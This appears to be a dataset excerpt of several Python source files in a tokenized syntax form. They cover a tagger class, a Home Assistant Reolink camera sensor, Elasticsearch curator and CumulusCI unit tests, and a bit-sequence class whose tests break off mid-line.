content
stringlengths 0
1.55M
|
---|
<class_stmt>Tagger(object)<block_start>tags=[]<def_stmt>__call__ self tokens<block_start><raise>NotImplementedError<block_end><def_stmt>check_tag self tag<block_start><return>tag<in>self.tags<block_end><block_end><class_stmt>PassTagger(Tagger)<block_start><def_stmt>__call__ self tokens<block_start><for_stmt>token tokens<block_start><yield>token<block_end><block_end><block_end><class_stmt>TaggersComposition(Tagger)<block_start><def_stmt>__init__ self taggers<block_start>self.taggers=taggers<block_end><def_stmt>__call__ self tokens<block_start><for_stmt>tagger self.taggers<block_start>tokens=tagger(tokens)<block_end><return>tokens<block_end><def_stmt>check_tag self tag<block_start><return>any(_.check_tag(tag)<for>_ self.taggers)<block_end><block_end>
|
"""This component provides support for Reolink IP VoD support."""<import_from_stmt>urllib.parse quote_plus<import_from_stmt>dataclasses dataclass<import_stmt>datetime<as>dt<import_stmt>asyncio<import_stmt>logging<import_stmt>os<import_from_stmt>dateutil relativedelta<import_from_stmt>homeassistant.core CALLBACK_TYPE HomeAssistant<import_stmt>homeassistant.util.dt<as>dt_utils<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.components.sensor DEVICE_CLASS_TIMESTAMP SensorEntity<import_from_stmt>.const BASE DOMAIN DOMAIN_DATA LAST_EVENT THUMBNAIL_EXTENSION THUMBNAIL_URL VOD_URL <import_from_stmt>.entity ReolinkEntity<import_from_stmt>.base ReolinkBase searchtime_to_datetime<import_from_stmt>.typings VoDEvent VoDEventThumbnail<line_sep>_LOGGER=logging.getLogger(__name__)<line_sep>@asyncio.coroutine<async_keyword><def_stmt>async_setup_entry hass:HomeAssistant config_entry async_add_devices<block_start>"""Set up the Reolink IP Camera switches."""<line_sep>devices=[]<line_sep>base:ReolinkBase=hass.data[DOMAIN][config_entry.entry_id][BASE]<line_sep># TODO : add playback (based off of hdd_info) to api capabilities
<await>base.api.get_switch_capabilities()<if_stmt>base.api.hdd_info<block_start>devices.append(LastEventSensor(hass config_entry))<block_end>async_add_devices(devices update_before_add=<false>)<block_end>@dataclass<class_stmt>_Attrs<block_start>oldest_day:dt.datetime=<none><line_sep>most_recent_day:dt.datetime=<none><line_sep>last_event:VoDEvent=<none><block_end><class_stmt>LastEventSensor(ReolinkEntity SensorEntity)<block_start>"""An implementation of a Reolink IP camera sensor."""<def_stmt>__init__ self hass:HomeAssistant config:ConfigEntry<block_start>"""Initialize a Reolink camera."""<line_sep>ReolinkEntity.__init__(self hass config)<line_sep>SensorEntity.__init__(self)<line_sep>self._attrs=_Attrs()<line_sep>self._bus_listener:CALLBACK_TYPE=<none><line_sep>self._entry_id=config.entry_id<block_end><async_keyword><def_stmt>async_added_to_hass self<arrow><none><block_start>"""Entity created."""<line_sep><await>super().async_added_to_hass()<line_sep>self._bus_listener=self.hass.bus.async_listen(self._base.event_id self.handle_event)<line_sep>self._hass.async_add_job(self._update_event_range)<block_end><async_keyword><def_stmt>async_will_remove_from_hass self<block_start>"""Entity removed"""<if_stmt>self._bus_listener<block_start>self._bus_listener()<line_sep>self._bus_listener=<none><block_end><await>super().async_will_remove_from_hass()<block_end><async_keyword><def_stmt>request_refresh self<block_start>""" force an update of the sensor """<line_sep><await>super().request_refresh()<line_sep>self._hass.async_add_job(self._update_event_range)<block_end><async_keyword><def_stmt>async_update self<block_start>""" polling update """<line_sep><await>super().async_update()<line_sep>self._hass.async_add_job(self._update_event_range)<block_end><async_keyword><def_stmt>_update_event_range self<block_start>end=dt_utils.now()<line_sep>start=self._attrs.most_recent_day<if_stmt><not>start<block_start>start=dt.datetime.combine(end.date().replace(day=1) dt.time.min)<if_stmt>self._base.playback_months<g>1<block_start>start<augsub>relativedelta.relativedelta(months=int(self._base.playback_months))<block_end><block_end>search,_=<await>self._base.send_search(start end <true>)<if_stmt><not>search<or>len(search)<l>1<block_start><return><block_end>entry=search[0]<line_sep>self._attrs.oldest_day=dt.datetime(entry["year"] entry["mon"] next((i<for>(i e) enumerate(entry["table"] start=1)<if>e<eq>"1")) tzinfo=end.tzinfo )<line_sep>entry=search[-1]<line_sep>start=self._attrs.most_recent_day=dt.datetime(entry["year"] entry["mon"] len(entry["table"])-next((i<for>(i e) enumerate(reversed(entry["table"]) start=0)<if>e<eq>"1")) tzinfo=end.tzinfo )<line_sep>end=dt.datetime.combine(start.date() dt.time.max tzinfo=end.tzinfo)<line_sep>_,files=<await>self._base.send_search(start end)<line_sep>file=files[-1]<if>files<and>len(files)<g>0<else><none><if_stmt>file<is><none><block_start><return><block_end>filename=file.get("name" "")<if_stmt>len(filename)<eq>0<block_start>_LOGGER.info("Search command provided a file record without a name: %s" str(file))<block_end>end=searchtime_to_datetime(file["EndTime"] start.tzinfo)<line_sep>start=searchtime_to_datetime(file["StartTime"] end.tzinfo)<line_sep>last=self._attrs.last_event=VoDEvent(str(start.timestamp()) start end-start filename )<line_sep>last.url=VOD_URL.format(camera_id=self._entry_id event_id=quote_plus(filename))<line_sep>thumbnail=last.thumbnail=VoDEventThumbnail(THUMBNAIL_URL.format(camera_id=self._entry_id event_id=last.event_id) path=os.path.join(self._base.thumbnail_path f"{last.event_id}.{THUMBNAIL_EXTENSION}") )<line_sep>thumbnail.exists=os.path.isfile(thumbnail.path)<line_sep>data:dict=self._hass.data.setdefault(DOMAIN_DATA {})<line_sep>data=data.setdefault(self._base.unique_id {})<line_sep>data[LAST_EVENT]=last<line_sep>self._state=<true><line_sep>self.async_schedule_update_ha_state()<block_end><async_keyword><def_stmt>handle_event self event<block_start>"""Handle incoming event for VoD update"""<if_stmt><not>"motion"<in>event.data<block_start><return><block_end>self._hass.async_add_job(self._update_event_range)<block_end>@property<def_stmt>unique_id self<block_start>"""Return Unique ID string."""<line_sep><return>f"reolink_lastevent_{self._base.unique_id}"<block_end>@property<def_stmt>name self<block_start>"""Return the name of this sensor."""<line_sep><return>f"{self._base.name} Last Event"<block_end>@property<def_stmt>device_class self<block_start>"""Device class of the sensor."""<line_sep><return>DEVICE_CLASS_TIMESTAMP<block_end>@property<def_stmt>state self<block_start>"""Return the state of the sensor."""<if_stmt><not>self._state<block_start><return><none><block_end>date=(self._attrs.last_event.start<if>self._attrs.last_event<and>self._attrs.last_event.start<else><none>)<if_stmt><not>date<block_start><return><none><block_end><return>date.isoformat()<block_end>@property<def_stmt>icon self<block_start>"""Icon of the sensor."""<line_sep><return>"mdi:history"<block_end>@property<def_stmt>extra_state_attributes self<block_start>"""Return the state attributes."""<line_sep>attrs=super().extra_state_attributes<if_stmt>self._state<block_start><if_stmt>attrs<is><none><block_start>attrs={}<block_end><if_stmt>self._attrs.oldest_day<block_start>attrs["oldest_day"]=self._attrs.oldest_day.isoformat()<block_end><if_stmt>self._attrs.last_event<block_start><if_stmt>self._attrs.last_event.event_id<block_start>attrs["vod_event_id"]=self._attrs.last_event.event_id<if_stmt>self._attrs.last_event.thumbnail<block_start>attrs["has_thumbnail"]=("true"<if>self._attrs.last_event.thumbnail.exists<else>"false")<line_sep>attrs["thumbnail_path"]=self._attrs.last_event.thumbnail.path<block_end><block_end><if_stmt>self._attrs.last_event.duration<block_start>attrs["duration"]=str(self._attrs.last_event.duration)<block_end><block_end><block_end><return>attrs<block_end><block_end>
|
<import_from_stmt>unittest TestCase<import_from_stmt>mock Mock patch<import_stmt>elasticsearch<import_stmt>curator<line_sep># Get test variables and constants from a single source
<import_from_stmt>. testvars<as>testvars<class_stmt>TestActionRestore(TestCase)<block_start><def_stmt>test_init_raise_bad_snapshot_list self<block_start>self.assertRaises(TypeError curator.Restore 'invalid')<block_end><def_stmt>test_init_raise_unsuccessful_snapshot_list self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.partial<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>self.assertRaises(curator.CuratorException curator.Restore slo)<block_end><def_stmt>test_snapshot_derived_name self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertEqual('snapshot-2015.03.01' ro.name)<block_end><def_stmt>test_provided_name self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo name=testvars.snap_name)<line_sep>self.assertEqual(testvars.snap_name ro.name)<block_end><def_stmt>test_partial_snap self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.partial<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo partial=<true>)<line_sep>self.assertEqual(testvars.snap_name ro.name)<block_end><def_stmt>test_provided_indices self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo indices=testvars.named_indices)<line_sep>self.assertEqual('snapshot-2015.03.01' ro.name)<block_end><def_stmt>test_extra_settings self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo extra_settings={'foo':'bar'})<line_sep>self.assertEqual(ro.body['foo'] 'bar')<block_end><def_stmt>test_bad_extra_settings self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo extra_settings='invalid')<line_sep>self.assertEqual(ro.body {'ignore_unavailable':<false> 'partial':<false> 'include_aliases':<false> 'rename_replacement':'' 'rename_pattern':'' 'indices':['index-2015.01.01' 'index-2015.02.01'] 'include_global_state':<false>})<block_end><def_stmt>test_get_expected_output self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo rename_pattern='(.+)' rename_replacement='new_$1')<line_sep>self.assertEqual(ro.expected_output ['new_index-2015.01.01' 'new_index-2015.02.01'])<block_end><def_stmt>test_do_dry_run self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertIsNone(ro.do_dry_run())<block_end><def_stmt>test_do_dry_run_with_renames self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo rename_pattern='(.+)' rename_replacement='new_$1')<line_sep>self.assertIsNone(ro.do_dry_run())<block_end><def_stmt>test_report_state_all self<block_start>client=Mock()<line_sep>client.info.return_value={'version':{'number':'5.0.0'}}<line_sep>client.snapshot.get.return_value=testvars.snapshot<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertIsNone(ro.report_state())<block_end><def_stmt>test_report_state_not_all self<block_start>client=Mock()<line_sep>client.info.return_value={'version':{'number':'5.0.0'}}<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.indices.get_settings.return_value=testvars.settings_one<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo rename_pattern='(.+)' rename_replacement='new_$1')<line_sep>self.assertRaises(curator.exceptions.FailedRestore ro.report_state)<block_end><def_stmt>test_do_action_success self<block_start>client=Mock()<line_sep>client.info.return_value={'version':{'number':'5.0.0'}}<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.nosnap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>client.indices.recovery.return_value=testvars.recovery_output<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo wait_interval=0.5 max_wait=1)<line_sep>self.assertIsNone(ro.do_action())<block_end><def_stmt>test_do_action_snap_in_progress self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.snap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertRaises(curator.SnapshotInProgress ro.do_action)<block_end><def_stmt>test_do_action_success_no_wfc self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.nosnap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo wait_for_completion=<false>)<line_sep>self.assertIsNone(ro.do_action())<block_end><def_stmt>test_do_action_report_on_failure self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.nosnap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>client.snapshot.restore.side_effect=testvars.fake_fail<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertRaises(curator.FailedExecution ro.do_action)<block_end><block_end>
|
<import_stmt>pytest<import_from_stmt>cumulusci.core.exceptions TaskOptionsError<import_from_stmt>cumulusci.tasks.metadata_etl AddPermissionSetPermissions<import_from_stmt>cumulusci.tasks.salesforce.tests.util create_task<import_from_stmt>cumulusci.utils.xml metadata_tree<line_sep>MD="{%s}"%metadata_tree.METADATA_NAMESPACE<line_sep>PERMSET_XML=b"""<?xml version="1.0" encoding="UTF-8"?>
<PermissionSet xmlns="http://soap.sforce.com/2006/04/metadata">
<applicationVisibilities>
<application>CustomApp</application>
<visible>false</visible>
</applicationVisibilities>
<classAccesses>
<apexClass>ApexController</apexClass>
<enabled>false</enabled>
</classAccesses>
<fieldPermissions>
<editable>false</editable>
<field>Test__c.Lookup__c</field>
<readable>false</readable>
</fieldPermissions>
<hasActivationRequired>false</hasActivationRequired>
<label>Test</label>
<objectPermissions>
<allowCreate>false</allowCreate>
<allowDelete>false</allowDelete>
<allowEdit>false</allowEdit>
<allowRead>false</allowRead>
<modifyAllRecords>false</modifyAllRecords>
<object>Test__c</object>
<viewAllRecords>false</viewAllRecords>
</objectPermissions>
<recordTypeVisibilities>
<recordType>Case.Test</recordType>
<visible>true</visible>
</recordTypeVisibilities>
<tabSettings>
<tab>standard-report</tab>
<visibility>Visible</visibility>
</tabSettings>
<userPermissions>
<enabled>true</enabled>
<name>ActivitiesAccess</name>
</userPermissions>
</PermissionSet>
"""<class_stmt>TestAddPermissionSetPermissions<block_start><def_stmt>test_adds_new_field_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "field_permissions":[{"field":"Test__c.Description__c" "readable":<true> "editable":<true> }] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']"))<eq>0)<line_sep>task._transform_entity(tree "PermSet")<line_sep>fieldPermissions=element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']")<assert_stmt>len(fieldPermissions)<eq>1<line_sep>readable=fieldPermissions[0].findall(f".//{MD}readable")<assert_stmt>len(readable)<eq>1<assert_stmt>readable[0].text<eq>"true"<line_sep>editable=fieldPermissions[0].findall(f".//{MD}editable")<assert_stmt>len(editable)<eq>1<assert_stmt>editable[0].text<eq>"true"<block_end><def_stmt>test_updates_existing_field_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "field_permissions":[{"field":"Test__c.Lookup__c" "readable":<true> "editable":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']"))<eq>1)<line_sep>task._transform_entity(tree "PermSet")._element<line_sep>fieldPermissions=element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']")<assert_stmt>len(fieldPermissions)<eq>1<line_sep>readable=fieldPermissions[0].findall(f".//{MD}readable")<assert_stmt>len(readable)<eq>1<assert_stmt>readable[0].text<eq>"true"<line_sep>editable=fieldPermissions[0].findall(f".//{MD}editable")<assert_stmt>len(editable)<eq>1<assert_stmt>editable[0].text<eq>"true"<block_end><def_stmt>test_adds_new_class_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "class_accesses":[{"apexClass":"LWCController" "enabled":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}classAccesses[{MD}apexClass='LWCController']"))<eq>0)<line_sep>task._transform_entity(tree "PermSet")<line_sep>classAccesses=element.findall(f".//{MD}classAccesses[{MD}apexClass='LWCController']")<assert_stmt>len(classAccesses)<eq>1<line_sep>enabled=classAccesses[0].findall(f".//{MD}enabled")<assert_stmt>len(enabled)<eq>1<assert_stmt>enabled[0].text<eq>"true"<block_end><def_stmt>test_upserts_existing_class_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "class_accesses":[{"apexClass":"ApexController" "enabled":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}classAccesses[{MD}apexClass='ApexController']"))<eq>1)<line_sep>task._transform_entity(tree "PermSet")._element<line_sep>classAccesses=element.findall(f".//{MD}classAccesses[{MD}apexClass='ApexController']")<assert_stmt>len(classAccesses)<eq>1<line_sep>enabled=classAccesses[0].findall(f".//{MD}enabled")<assert_stmt>len(enabled)<eq>1<assert_stmt>enabled[0].text<eq>"true"<block_end><def_stmt>test_missing_apexclass_throws_exception self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "class_accesses":[{"enabled":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<with_stmt>pytest.raises(TaskOptionsError)<block_start>task._transform_entity(tree "PermSet")<block_end><block_end><def_stmt>test_missing_field_throws_exception self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "field_permissions":[{"readable":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<with_stmt>pytest.raises(TaskOptionsError)<block_start>task._transform_entity(tree "PermSet")<block_end><block_end><block_end>
|
<import_stmt>re<import_stmt>operator<import_from_stmt>functools reduce<import_stmt>collections.abc<line_sep>__all__=["bits"]<class_stmt>bits<block_start>"""An immutable bit sequence, like ``bytes`` but for bits.
This bit sequence is ordered from LSB to MSB; this is the direction in which it is converted
to and from iterators, and to and from bytes. Note, however, that it is converted to and from
strings (which should be only used where a human-readable form is required) from MSB to LSB;
this matches the way integer literals are written, as well as values in datasheets and other
documentation.
"""<line_sep>__slots__=["_len_" "_int_"]<line_sep>@classmethod<def_stmt>from_int cls value length=<none><block_start>value=operator.index(value)<if_stmt>length<is><none><block_start><if_stmt>value<l>0<block_start><raise>ValueError("invalid negative input for bits(): '{}'".format(value))<block_end>length=value.bit_length()<block_end><else_stmt><block_start>length=operator.index(length)<line_sep>value<augand>~(-1<lshift>length)<block_end>inst=object.__new__(cls)<line_sep>inst._len_=length<line_sep>inst._int_=value<line_sep><return>inst<block_end>@classmethod<def_stmt>from_str cls value<block_start>value=re.sub(r"[\s_]" "" value)<if_stmt>value<block_start><if_stmt>value[0]<eq>"-"<block_start><raise>ValueError("invalid negative input for bits(): '{}'".format(value))<block_end><elif_stmt>value[0]<eq>"+"<block_start>length=len(value)-1<block_end><else_stmt><block_start>length=len(value)<block_end><return>cls.from_int(int(value 2) length)<block_end><else_stmt><block_start><return>cls.from_int(0)<block_end><block_end>@classmethod<def_stmt>from_iter cls iterator<block_start>length=-1<line_sep>value=0<for_stmt>length,bit enumerate(iterator)<block_start>value<augor>bool(bit)<lshift>length<block_end><return>cls.from_int(value length+1)<block_end>@classmethod<def_stmt>from_bytes cls value length<block_start><return>cls.from_int(int.from_bytes(value "little") length)<block_end><def_stmt>__new__ cls value=0 length=<none><block_start><if_stmt>isinstance(value cls)<block_start><if_stmt>length<is><none><block_start><return>value<block_end><else_stmt><block_start><return>cls.from_int(value._int_ length)<block_end><block_end><if_stmt>isinstance(value int)<block_start><return>cls.from_int(value length)<block_end><if_stmt>isinstance(value str)<block_start><if_stmt>length<is><not><none><block_start><raise>ValueError("invalid input for bits(): when converting from str "<concat>"length must not be provided")<block_end><return>cls.from_str(value)<block_end><if_stmt>isinstance(value (bytes bytearray memoryview))<block_start><if_stmt>length<is><none><block_start><raise>ValueError("invalid input for bits(): when converting from bytes "<concat>"length must be provided")<block_end><return>cls.from_bytes(value length)<block_end><if_stmt>isinstance(value collections.abc.Iterable)<block_start><if_stmt>length<is><not><none><block_start><raise>ValueError("invalid input for bits(): when converting from an iterable "<concat>"length must not be provided")<block_end><return>cls.from_iter(value)<block_end><raise>TypeError("invalid input for bits(): cannot convert from {}".format(value.__class__.__name__))<block_end><def_stmt>__len__ self<block_start><return>self._len_<block_end><def_stmt>__bool__ self<block_start><return>bool(self._len_)<block_end><def_stmt>to_int self<block_start><return>self._int_<block_end>__int__=to_int<def_stmt>to_str self<block_start><if_stmt>self._len_<block_start><return>format(self._int_ "0{}b".format(self._len_))<block_end><return>""<block_end>__str__=to_str<def_stmt>to_bytes self<block_start><return>self._int_.to_bytes((self._len_+7)<floordiv>8 "little")<block_end>__bytes__=to_bytes<def_stmt>__repr__ self<block_start><return>"bits('{}')".format(self)<block_end><def_stmt>__getitem__ self key<block_start><if_stmt>isinstance(key int)<block_start><if_stmt>key<l>0<block_start><return>(self._int_<rshift>(self._len_+key))&1<block_end><else_stmt><block_start><return>(self._int_<rshift>key)&1<block_end><block_end><if_stmt>isinstance(key slice)<block_start>start,stop,step=key.indices(self._len_)<assert_stmt>step<eq>1<if_stmt>stop<l>start<block_start><return>self.__class__()<block_end><else_stmt><block_start><return>self.__class__(self._int_<rshift>start stop-start)<block_end><block_end><raise>TypeError("bits indices must be integers or slices, not {}".format(key.__class__.__name__))<block_end><def_stmt>__iter__ self<block_start><for_stmt>bit range(self._len_)<block_start><yield>(self._int_<rshift>bit)&1<block_end><block_end><def_stmt>__eq__ self other<block_start><try_stmt><block_start>other=self.__class__(other)<block_end><except_stmt>TypeError<block_start><return><false><block_end><return>self._len_<eq>other._len_<and>self._int_<eq>other._int_<block_end><def_stmt>__add__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_|(other._int_<lshift>self._len_) self._len_+other._len_)<block_end><def_stmt>__radd__ self other<block_start>other=self.__class__(other)<line_sep><return>other+self<block_end><def_stmt>__mul__ self other<block_start><if_stmt>isinstance(other int)<block_start><return>self.__class__(reduce(<lambda>a b:(a<lshift>self._len_)|b (self._int_<for>_ range(other)) 0) self._len_<times>other)<block_end><return>NotImplemented<block_end><def_stmt>__rmul__ self other<block_start><return>self<times>other<block_end><def_stmt>__and__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_&other._int_ max(self._len_ other._len_))<block_end><def_stmt>__rand__ self other<block_start>other=self.__class__(other)<line_sep><return>self&other<block_end><def_stmt>__or__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_|other._int_ max(self._len_ other._len_))<block_end><def_stmt>__ror__ self other<block_start>other=self.__class__(other)<line_sep><return>self|other<block_end><def_stmt>__xor__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_^other._int_ max(self._len_ other._len_))<block_end><def_stmt>__rxor__ self other<block_start>other=self.__class__(other)<line_sep><return>self^other<block_end><def_stmt>reversed self<block_start>value=0<for_stmt>bit range(self._len_)<block_start>value<auglshift>1<if_stmt>(self._int_<rshift>bit)&1<block_start>value<augor>1<block_end><block_end><return>self.__class__(value self._len_)<block_end><def_stmt>find self sub start=0 end=-1<block_start>sub=self.__class__(sub)<if_stmt>start<l>0<block_start>start=self._len_-start<block_end><if_stmt>end<l>0<block_start>end=self._len_-end<block_end><for_stmt>pos range(start end)<block_start><if_stmt>self[pos:pos+len(sub)]<eq>sub<block_start><return>pos<block_end><block_end><else_stmt><block_start><return>-1<block_end><block_end><block_end># -------------------------------------------------------------------------------------------------
<import_stmt>unittest<class_stmt>BitsTestCase(unittest.TestCase)<block_start><def_stmt>assertBits self value bit_length bit_value<block_start>self.assertIsInstance(value bits)<line_sep>self.assertEqual(value._len_ bit_length)<line_sep>self.assertEqual(value._int_ bit_value)<block_end><def_stmt>test_from_int self<block_start>self.assertBits(bits.from_int(0) 0 0b0)<line_sep>self.assertBits(bits.from_int(1) 1 0b1)<line_sep>self.assertBits(bits.from_int(2) 2 0b10)<line_sep>self.assertBits(bits.from_int(2 5) 5 0b00010)<line_sep>self.assertBits(bits.from_int(0b110 2) 2 0b10)<line_sep>self.assertBits(bits.from_int(-1 16) 16 0xffff)<block_end><def_stmt>test_from_int_wrong self<block_start><with_stmt>self.assertRaisesRegex(ValueError r"invalid negative input for bits\(\): '-1'")<block_start>bits.from_int(-1)<block_end><block_end><def_stmt>test_from_str self<block_start>self.assertBits(bits.from_str("") 0 0b0)<line_sep>self.assertBits(bits.from_str("0") 1 0b0)<line_sep>self.assertBits(bits.from_str("010") 3 0b010)<line_sep>self.assertBits(bits.from_str("0 1 011_100") 8 0b01011100)<line_sep>self.assertBits(bits.from_str("+0 1 \t011_100") 8 0b01011100)<block_end><def_stmt>test_from_str_wrong self<block_start><with_stmt>self.assertRaisesRegex(ValueError r"invalid negative input for bits\(\): '-1'")<block_start>bits.from_str("-1")<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid literal for int\(\) with base 2: '23'")<block_start>bits.from_str("23")<block_end><block_end><def_stmt>test_from_bytes self<block_start>self.assertBits(bits.from_bytes(b"\xa5" 8) 8 0b10100101)<line_sep>self.assertBits(bits.from_bytes(b"\xa5\x01" 9) 9 0b110100101)<line_sep>self.assertBits(bits.from_bytes(b"\xa5\xff" 9) 9 0b110100101)<block_end><def_stmt>test_from_iter self<block_start>self.assertBits(bits.from_iter(iter([])) 0 0b0)<line_sep>self.assertBits(bits.from_iter(iter([1 1 0 1 0 0 1])) 7 0b1001011)<block_end><def_stmt>test_new self<block_start>self.assertBits(bits() 0 0b0)<line_sep>self.assertBits(bits(10) 4 0b1010)<line_sep>self.assertBits(bits(10 2) 2 0b10)<line_sep>self.assertBits(bits("1001") 4 0b1001)<line_sep>self.assertBits(bits(b"\xa5\x01" 9) 9 0b110100101)<line_sep>self.assertBits(bits(bytearray(b"\xa5\x01") 9) 9 0b110100101)<line_sep>self.assertBits(bits(memoryview(b"\xa5\x01") 9) 9 0b110100101)<line_sep>self.assertBits(bits([1 1 0 1 0 0 1]) 7 0b1001011)<line_sep>self.assertBits(bits(bits("1001") 2) 2 0b01)<line_sep>some=bits("1001")<line_sep>self.assertIs(bits(some) some)<block_end><def_stmt>test_new_wrong self<block_start><with_stmt>self.assertRaisesRegex(TypeError r"invalid input for bits\(\): cannot convert from float")<block_start>bits(1.0)<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid input for bits\(\): when converting from str "<concat>r"length must not be provided")<block_start>bits("1010" 5)<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid input for bits\(\): when converting from bytes "<concat>r"length must be provided")<block_start>bits(b"\xa5")<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid input for bits\(\): when converting from an iterable "<concat>r"length must not be provided")<block_start>bits([1 0 1 0] 5)<block_end><block_end><def_stmt>test_len self<block_start>self.assertEqual(len(bits(10)) 4)<block_end><def_stmt>test_bool self<block_start>self.assertFalse(bits(""))<line_sep>self.assertTrue(bits("1"))<line_sep>self.assertTrue(bits("01"))<line_sep>self.assertTrue(bits("0"))<line_sep>self.assertTrue(bits("00"))<block_end><def_stmt>test_int self<block_start>self.assertEqual(int(bits("1010")) 0b1010)<block_end><def_stmt>test_str self<block_start>self.assertEqual(str(bits("")) "")<line_sep>self.assertEqual(str(bits("0000")) "0000")<line_sep>self.assertEqual(str(bits("1010")) "1010")<line_sep>self.assertEqual(str(bits("01010")) "01010")<block_end><def_stmt>test_bytes self<block_start>self.assertEqual(bytes(bits("")) 